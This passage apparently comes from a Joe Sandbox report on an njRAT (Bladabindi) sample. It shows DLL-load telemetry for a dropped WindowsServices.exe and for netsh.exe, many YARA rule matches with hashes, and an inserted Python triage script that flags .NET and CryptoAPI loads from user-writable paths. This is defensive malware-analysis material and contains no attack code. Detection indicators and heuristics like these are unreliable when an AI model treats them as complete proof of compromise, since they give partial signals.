        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: wbemcomn.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: amsi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: avicap32.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: msvfw32.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: sxs.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: mfc42.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mfc42.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mfc42.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptbase.dll
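Added triage example, not part of the Joe Sandbox report: the rows above are image-load telemetry, and the two things an analyst wants from them are "which process loaded what" and "which combinations matter". The script below parses rows in the shape the report uses (tolerating the raw extraction form with no separator and a trailing "Jump to behavior" link label), groups modules per process image, and flags a binary in a user-writable directory that loads the .NET CLR (mscoree.dll) and the CryptoAPI provider pair (cryptsp.dll + rsaenh.dll). The sample rows, the path list and the finding tags are constructed for this example. The netsh.exe caveat is general Windows behaviour: netsh loads every helper DLL registered under HKLM\SOFTWARE\Microsoft\NetSh when it starts, so its module list is the same whatever subcommand was run and says nothing on its own about the firewall change reported elsewhere on this page; the command line is the evidence for that.

```python
"""Triage of Joe Sandbox "Section loaded" rows: group image-load events per
process image and flag the combinations worth a second look."""
import re
from collections import defaultdict

# Row shape as extracted from the report. The " | " separator and the
# trailing "Jump to behavior" link label are both optional.
ROW_RE = re.compile(
    r"Source:\s*(?P<image>.+?)\s*\|?\s*Section loaded:\s*"
    r"(?P<module>[\w.\-]+?)(?:Jump to behavior)?\s*$"
)

# Directories an unprivileged user can write to (constructed list; extend
# to taste). A binary running from here is a dropped file, not an
# installed application.
USER_WRITABLE = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\users\\public\\",
)

# Constructed sample in the report's row shape: two netsh rows (one in the
# raw extraction form), the dropped WindowsServices.exe, and a benign
# control binary under Program Files that also loads the CLR.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: mfc42.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: rsaenh.dll
Source: C:\Program Files\ExampleVendor\app.exe | Section loaded: mscoree.dll
"""


def parse_rows(text):
    """Return a list of (image_path, module_name) tuples, one per row."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if m:
            events.append((m.group("image"), m.group("module").lower()))
    return events


def modules_by_image(events):
    """Collapse repeated load events into the set of modules per image."""
    grouped = defaultdict(set)
    for image, module in events:
        grouped[image].add(module)
    return grouped


def assess(grouped):
    """Return (image, tag) findings for the module combinations of interest."""
    findings = []
    for image, mods in grouped.items():
        low = image.lower()
        from_user_dir = any(d in low for d in USER_WRITABLE)
        # mscoree.dll is the CLR shim: the image is a managed (.NET) binary.
        if from_user_dir and "mscoree.dll" in mods:
            findings.append((image, "dotnet_from_user_writable_path"))
        # cryptsp.dll + rsaenh.dll: the Microsoft Enhanced Cryptographic
        # Provider was initialised, i.e. the binary used CryptoAPI.
        if from_user_dir and {"cryptsp.dll", "rsaenh.dll"} <= mods:
            findings.append((image, "cryptoapi_provider_loaded"))
        # netsh loads all registered helper DLLs at startup regardless of
        # the subcommand, so only the command line shows what it changed.
        if low.endswith("\\netsh.exe"):
            findings.append((image, "netsh_helpers_loaded_check_cmdline"))
    return findings


if __name__ == "__main__":
    for image, tag in assess(modules_by_image(parse_rows(SAMPLE_ROWS))):
        print(f"{tag:40s} {image}")
```

The control row under Program Files loads mscoree.dll too and is not flagged, which is the point of keying the .NET check on the image path rather than on the module alone: the CLR load is noise for installed software and signal for a file in %TEMP%.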
Source: iR2UtZj5vP.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
